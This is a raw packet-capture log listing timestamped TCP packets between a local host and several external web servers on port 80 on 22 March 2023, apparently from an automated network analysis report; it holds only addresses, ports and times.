Mar 22, 2023 05:43:31.124022007 CET	49836	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:31.147352934 CET	80	49836	13.248.216.40	192.168.2.5
Mar 22, 2023 05:43:31.148828030 CET	49836	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:31.149724007 CET	80	49833	72.44.93.236	192.168.2.5
Mar 22, 2023 05:43:31.167340994 CET	49836	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:31.167867899 CET	49837	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:31.167936087 CET	80	49835	52.86.6.113	192.168.2.5
Mar 22, 2023 05:43:31.168035984 CET	49835	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:31.168375969 CET	49835	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:31.171646118 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.171669960 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.171690941 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.171711922 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.171730995 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.171740055 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.171751022 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.171770096 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.171777964 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.171788931 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.171797037 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.171808004 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.171814919 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.171827078 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.171842098 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.171847105 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.171859980 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.171864033 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.171875954 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.171891928 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.171907902 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.184972048 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.184998989 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.185100079 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.185564041 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.185586929 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.185610056 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.185655117 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.185655117 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.185880899 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.185904980 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.185928106 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.185935020 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.185969114 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.185969114 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.186680079 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.186733007 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.186736107 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.186753988 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.186803102 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.187474012 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.187498093 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.187520981 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.187546968 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.187586069 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.188277960 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.188302994 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.188323021 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.188380003 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.188415051 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.188709974 CET	80	49831	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:31.189857960 CET	80	49831	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:31.190567017 CET	80	49831	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:31.190586090 CET	80	49782	80.93.82.33	192.168.2.5
Mar 22, 2023 05:43:31.190674067 CET	49782	80	192.168.2.5	80.93.82.33
Mar 22, 2023 05:43:31.190733910 CET	49831	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:31.190973997 CET	49831	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:31.190978050 CET	80	49836	13.248.216.40	192.168.2.5
Mar 22, 2023 05:43:31.192853928 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.192878962 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.192903042 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.192956924 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.193001986 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.193279982 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.193303108 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.193325996 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.193367004 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.193403959 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.193969965 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.194222927 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.199379921 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.199410915 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.199434996 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.199496031 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.199548960 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.199593067 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.199618101 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.199675083 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.199989080 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.200020075 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.200047970 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.200082064 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.200117111 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.200745106 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.200776100 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.200804949 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.200845957 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.200882912 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.201461077 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.201493025 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.201522112 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.201556921 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.201586962 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.206406116 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.206439018 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.206490040 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.206525087 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.206572056 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.206779957 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.206819057 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.206857920 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.206882000 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.207012892 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.207580090 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.207621098 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.207647085 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.207659006 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.207678080 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.207726955 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.208359003 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.208400011 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.208435059 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.208437920 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.208584070 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.209014893 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.209155083 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.209197044 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.209237099 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.209254026 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.209287882 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.209305048 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.209969997 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.210011005 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.210047007 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.210140944 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.210180998 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.210752964 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.210794926 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.210834980 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.210854053 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.211016893 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.211533070 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.211572886 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.211601973 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.211611032 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.211627960 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.211668015 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.212294102 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.212333918 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.212400913 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.213860035 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.213892937 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.214005947 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.214288950 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.214329004 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.214354038 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.214368105 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.214407921 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.214425087 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.215012074 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.215054035 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.215087891 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.215092897 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.215121031 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.215132952 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.215190887 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.215948105 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.215992928 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.216026068 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.216065884 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.216065884 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.216598988 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.216648102 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.216684103 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.216722965 CET	80	49833	72.44.93.236	192.168.2.5
Mar 22, 2023 05:43:31.216727018 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.216727018 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.216775894 CET	49833	80	192.168.2.5	72.44.93.236
Mar 22, 2023 05:43:31.216984987 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.217077971 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.217112064 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.217133999 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.217139006 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.217184067 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.217195034 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.217231989 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.220608950 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.220658064 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.220705032 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.220748901 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.220832109 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.220874071 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.221084118 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.221131086 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.221179008 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.221208096 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.221224070 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.221283913 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.222007036 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.222054958 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.222085953 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.222099066 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.222110033 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.222142935 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.222153902 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.222194910 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.222956896 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.223006010 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.223050117 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.223068953 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.223094940 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.223150015 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.223963022 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.223999023 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.224057913 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.225625038 CET	49838	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:31.228319883 CET	80	49833	72.44.93.236	192.168.2.5
Mar 22, 2023 05:43:31.228497982 CET	49833	80	192.168.2.5	72.44.93.236
Mar 22, 2023 05:43:31.232327938 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.232377052 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.232414961 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.232492924 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.232505083 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.232542038 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.232551098 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.232594967 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.232640028 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.232650995 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.232650995 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.232672930 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.232697964 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.232717037 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.248610020 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.248666048 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.248713017 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.248758078 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.248804092 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.248819113 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.248850107 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.248852968 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.248886108 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.248886108 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.248889923 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.253184080 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.257108927 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.257143974 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.257175922 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.257205963 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.257237911 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.257247925 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.257261038 CET	80	49834	104.26.10.81	192.168.2.5
Mar 22, 2023 05:43:31.257268906 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.257312059 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.257340908 CET	49834	80	192.168.2.5	104.26.10.81
Mar 22, 2023 05:43:31.288430929 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.288482904 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.288530111 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.288577080 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.288621902 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.288669109 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.288665056 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.288714886 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.288714886 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.288718939 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.288765907 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.288813114 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.288820982 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.288861036 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.288906097 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.288916111 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.288954020 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.288959980 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.289002895 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.289050102 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.289057970 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.289288998 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.306019068 CET	80	49837	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:31.308773041 CET	49837	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:31.316721916 CET	80	49835	52.86.6.113	192.168.2.5
Mar 22, 2023 05:43:31.316765070 CET	80	49835	52.86.6.113	192.168.2.5
Mar 22, 2023 05:43:31.316843033 CET	49835	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:31.316843033 CET	49835	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:31.328711033 CET	80	49836	13.248.216.40	192.168.2.5
Mar 22, 2023 05:43:31.328775883 CET	49836	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:31.348536968 CET	49837	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:31.348994970 CET	49835	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:31.363293886 CET	80	49831	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:31.395312071 CET	80	49838	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:31.395417929 CET	49838	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:31.428232908 CET	80	49785	70.39.251.249	192.168.2.5
Mar 22, 2023 05:43:31.428453922 CET	49785	80	192.168.2.5	70.39.251.249
Mar 22, 2023 05:43:31.456969976 CET	49836	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:31.457353115 CET	49838	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:31.480299950 CET	80	49836	13.248.216.40	192.168.2.5
Mar 22, 2023 05:43:31.486922026 CET	80	49837	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:31.487863064 CET	80	49837	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:31.488924026 CET	49837	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:31.489124060 CET	80	49837	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:31.489200115 CET	49837	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:31.497081995 CET	80	49835	52.86.6.113	192.168.2.5
Mar 22, 2023 05:43:31.521112919 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521166086 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521225929 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521274090 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521320105 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521365881 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521400928 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.521409988 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521456003 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521460056 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.521460056 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.521485090 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.521502018 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521578074 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.521593094 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521644115 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521661997 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.521691084 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521737099 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521752119 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.521785021 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521830082 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521843910 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.521877050 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521883965 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.521923065 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521969080 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.521981001 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.522015095 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.522062063 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.522067070 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.522108078 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.522155046 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.522162914 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.522205114 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.522212029 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.522253990 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.522300005 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.522310019 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.522346020 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.522392035 CET	80	49828	39.99.233.155	192.168.2.5
